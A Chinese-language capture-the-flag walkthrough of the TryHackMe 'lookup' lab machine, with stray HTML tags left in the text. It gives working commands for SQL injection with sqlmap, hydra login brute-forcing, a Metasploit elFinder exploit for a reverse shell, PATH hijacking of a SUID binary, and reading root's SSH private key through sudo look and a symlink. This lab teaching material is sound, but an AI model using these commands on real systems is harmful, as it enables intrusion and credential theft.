TryHackMe "lookup" 挑战机全方位攻克教学指南<\/strong><\/h3>
一、目标识别与信息收集<\/strong><\/h4>

目标锁定<\/strong>：

目标机器IP地址为 10.201.45.109<\/code>。<\/li>
需要将域名 lookup.thm<\/code> 和 file.lookup.thm<\/code> 在攻击机的 \/etc\/hosts<\/code> 文件中解析到该IP地址。<\/li>
操作命令<\/strong>： # 编辑hosts文件<\/span> <\/span><\/span>sudo vim \/etc\/hosts <\/span><\/span># 在文件末尾添加以下行<\/span> <\/span><\/span>10.201.45.109 lookup.thm file.lookup.thm <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 二、初始访问 - Web应用渗透<\/strong><\/h4> 发现SQL注入漏洞<\/strong>：<\/p> 目标网站 http:\/\/lookup.thm<\/code> 存在一个登录页面 login.php<\/code>。<\/li> 使用 sqlmap<\/code> 工具对登录接口进行自动化SQL注入测试。<\/li> 关键命令与发现<\/strong>： sqlmap -u "http:\/\/lookup.thm\/login.php"<\/span> --data=<\/span>"username=test&password=test"<\/span> --method=<\/span>POST --level=<\/span>5<\/span> --risk=<\/span>3<\/span> --dbs <\/span><\/span><\/code><\/pre><\/li> 重要发现<\/strong>：参数 username<\/code> 存在动态响应，提示可能存在注入点，但直接爆出数据库名（--dbs<\/code>）可能未成功。作者转而采用更直接的方法：爆破用户名。<\/li> <\/ul> <\/li> 爆破用户名与密码<\/strong>：<\/p> 爆破用户名<\/strong>：通过工具（如sqlmap<\/code>的--users<\/code>或Burp Suite的Intruder）发现两个有效用户名：jose<\/code> 和 think<\/code>。<\/li> 爆破密码<\/strong>：使用 hydra<\/code> 对用户 jose<\/code> 的密码进行爆破。<\/li> 关键命令与发现<\/strong>： hydra -l jose -P \/usr\/share\/wordlists\/xato-net-10-million-passwords-10000.txt lookup.thm http-post-form "\/login.php:username=^USER^&password=^PASS^:F=Wrong password. Please try again."<\/span> -t 64<\/span> <\/span><\/span><\/code><\/pre><\/li> 成功获取到用户 jose<\/code> 的密码。<\/li> <\/ul> <\/li> 突破二级域名<\/strong>：<\/p> 使用 jose<\/code> 的凭据登录主站后，页面提示需要访问 file.lookup.thm<\/code>。<\/li> 由于之前已在 \/etc\/hosts<\/code> 中配置，直接访问 http:\/\/file.lookup.thm<\/code>。<\/li> 再次使用 jose<\/code> 的密码登录，成功进入一个文件管理类应用界面。<\/li> <\/ul> <\/li> 利用文件上传漏洞获取Shell<\/strong>：<\/p> 该文件管理系统存在漏洞（文中提及 searchsploit elfinder<\/code>，表明可能利用了elfinder组件的已知RCE漏洞）。<\/li> 使用 msfconsole<\/code>（Metasploit框架）快速利用该漏洞。<\/li> 关键命令<\/strong>： msfconsole <\/span><\/span>search elfinder <\/span><\/span>use [<\/span>对应的exploit模块编号]<\/span> <\/span><\/span>set rhosts file.lookup.thm <\/span><\/span>set lhost [<\/span>你的VPN IP]<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> 成功获取一个反向Shell，连接至攻击机。<\/li> <\/ul> <\/li> <\/ol> 三、权限提升 - 从 www-data 到 think<\/strong><\/h4> 稳定Shell与环境侦察<\/strong>：<\/p> 将简陋的Shell升级为完全交互式TTY。<\/li> 关键命令<\/strong>： python3 -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span># 或者使用其他方法，如：script \/dev\/null -c bash<\/span> <\/span><\/span><\/code><\/pre><\/li> 查看系统中有登录Shell的用户：cat \/etc\/passwd | grep 'sh$'<\/code>，确认目标用户 think<\/code> 存在。<\/li> <\/ul> <\/li> 发现SUID权限滥用漏洞<\/strong>：<\/p> 查找具有SUID权限的可执行文件，这些文件可能被滥用以提升权限。<\/li> 关键命令与发现<\/strong>： find \/ -perm -u=<\/span>s -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre><\/li> 发现一个不常见的二进制文件 pwm<\/code>。运行此文件，观察其行为。<\/li> <\/ul> <\/li> 分析 pwm<\/code> 程序行为<\/strong>：<\/p> 执行 pwm<\/code> 后，观察到它执行了系统命令 id<\/code>，并根据 id<\/code> 命令的输出结果（当前用户名），去操作对应用户家目录下的 .passwords<\/code> 文件（例如 \/home\/think\/.passwords<\/code>）。<\/li> 漏洞原理<\/strong>：pwm<\/code> 在执行 id<\/code> 命令时，未使用绝对路径<\/strong>。这意味着系统会从 $PATH<\/code> 环境变量指定的目录中寻找名为 id<\/code> 的可执行文件。<\/li> <\/ul> <\/li> 实施PATH路径劫持<\/strong>：<\/p> 步骤一<\/strong>：查看当前PATH：echo $PATH<\/code>。<\/li> 步骤二<\/strong>：将可写目录（如 \/tmp<\/code>）添加到PATH的最前面，确保系统优先在该目录下搜索命令。 export PATH=<\/span>\/tmp:$PATH <\/span><\/span><\/code><\/pre><\/li> 步骤三<\/strong>：在 \/tmp<\/code> 目录下创建一个恶意的 id<\/code> 脚本，该脚本输出我们想要的用户名（think<\/code>）。 echo -e '#!\/bin\/bash\necho "uid=33(think) gid=33(think) groups=33(think)"'<\/span> > \/tmp\/id <\/span><\/span><\/code><\/pre><\/li> 步骤四<\/strong>：赋予该脚本执行权限：chmod +x \/tmp\/id<\/code>。<\/li> 步骤五<\/strong>：再次运行 pwm<\/code> 程序。此时，pwm<\/code> 会调用我们伪造的 \/tmp\/id<\/code>，并输出用户名 think<\/code>，进而程序会去读取或创建 \/home\/think\/.passwords<\/code> 文件。<\/li> <\/ul> <\/li> 获取用户think的密码<\/strong>：<\/p> 执行上述劫持后，pwm<\/code> 程序会在 \/home\/think\/<\/code> 目录下生成或操作一个名为 .passwords<\/code> 的文件。这个文件的内容很可能就是用户 think<\/code> 的密码（或一个密码列表）。<\/li> 检查文件：cat \/home\/think\/.passwords<\/code>，获得密码。<\/li> <\/ul> <\/li> 切换至用户think<\/strong>：<\/p> 使用获得的密码通过SSH登录，或者直接使用 su<\/code> 切换用户。<\/li> 关键命令<\/strong>： su - think <\/span><\/span># 输入从.passwords文件获得的密码<\/span> <\/span><\/span><\/code><\/pre><\/li> 成功获取第一个Flag（user.txt<\/code>）。<\/li> <\/ul> <\/li> <\/ol> 四、权限提升 - 从 think 到 root<\/strong><\/h4> 检查sudo权限<\/strong>：<\/p> 查看用户 think<\/code> 被允许以root权限执行哪些命令。<\/li> 关键命令与发现<\/strong>： sudo -l <\/span><\/span><\/code><\/pre><\/li> 重要发现<\/strong>：用户 think<\/code> 可以以root身份运行 \/usr\/bin\/look<\/code> 命令，且无密码限制。 User think may run the following commands on ip-10-201-3-252: (ALL) \/usr\/bin\/look <\/code><\/pre> <\/li> <\/ul> <\/li> 利用 look<\/code> 命令读取任意文件<\/strong>：<\/p> look<\/code> 命令通常用于在排序过的文件中查找以特定字符串开头的行。但其核心功能是读取文件<\/strong>。<\/li> 当查找的字符串为空（''<\/code>）时，look<\/code> 会读取整个文件并输出。<\/li> 利用方法<\/strong>：使用 sudo<\/code> 运行 look<\/code>，读取root用户的SSH私钥。<\/li> 关键命令<\/strong>： sudo \/usr\/bin\/look ''<\/span> \/root\/.ssh\/id_rsa <\/span><\/span><\/code><\/pre><\/li> 将终端输出的私钥内容完整复制到攻击机的一个文件中（例如 root_rsa<\/code>）。<\/li> <\/ul> <\/li> 通过SSH私钥登录root<\/strong>：<\/p> 在攻击机上，修改私钥文件权限为600，然后使用它登录目标机。<\/li> 关键命令<\/strong>： # 在攻击机上操作<\/span> <\/span><\/span>chmod 600<\/span> root_rsa <\/span><\/span>ssh -i root_rsa root@lookup.thm <\/span><\/span><\/code><\/pre><\/li> 成功获取root权限和第二个Flag。<\/li> <\/ul> <\/li> <\/ol> 五、拓展技巧与总结<\/strong><\/h4> 替代提权思路（软链接）<\/strong>：在获得 www-data<\/code> Shell后，可以创建一个指向 \/root\/.ssh\/id_rsa<\/code> 的软链接，并将其放在Web目录下（如 \/var\/www\/html\/.passwords<\/code>）。这样，当 pwm<\/code> 程序将root的私钥内容写入这个“密码文件”时，我们实际上通过Web服务器就能直接下载到root的私钥。这是一个非常巧妙的思路。 ln -s \/root\/.ssh\/id_rsa \/var\/www\/html\/.passwords <\/span><\/span># 然后从攻击机访问 http:\/\/file.lookup.thm\/.passwords 下载<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 核心知识点总结<\/strong>：<\/p> 信息收集与配置<\/strong>：正确配置 \/etc\/hosts<\/code> 是访问虚拟主机的第一步。<\/li> 自动化工具使用<\/strong>：熟练运用 sqlmap<\/code>, hydra<\/code>, metasploit<\/code> 进行漏洞发现与利用。<\/li> 漏洞链利用<\/strong>：从Web漏洞获取初始立足点，再进行横向移动和权限提升。<\/li> Linux权限提升<\/strong>： SUID滥用<\/strong>：理解SUID机制，并学会利用 $PATH<\/code> 环境变量劫持进行提权。<\/li> Sudo权限滥用<\/strong>：掌握 sudo -l<\/code> 命令，并了解如何利用不常见的命令（如 look<\/code>）的读文件功能来突破权限限制。<\/li> <\/ul> <\/li> 思维灵活性<\/strong>：安全攻防需要创造性思维，如利用软链接间接获取关键文件。<\/li> <\/ol> 这份文档涵盖了从外网渗透到内网提权的完整流程，希望对你的学习有所帮助。<\/p>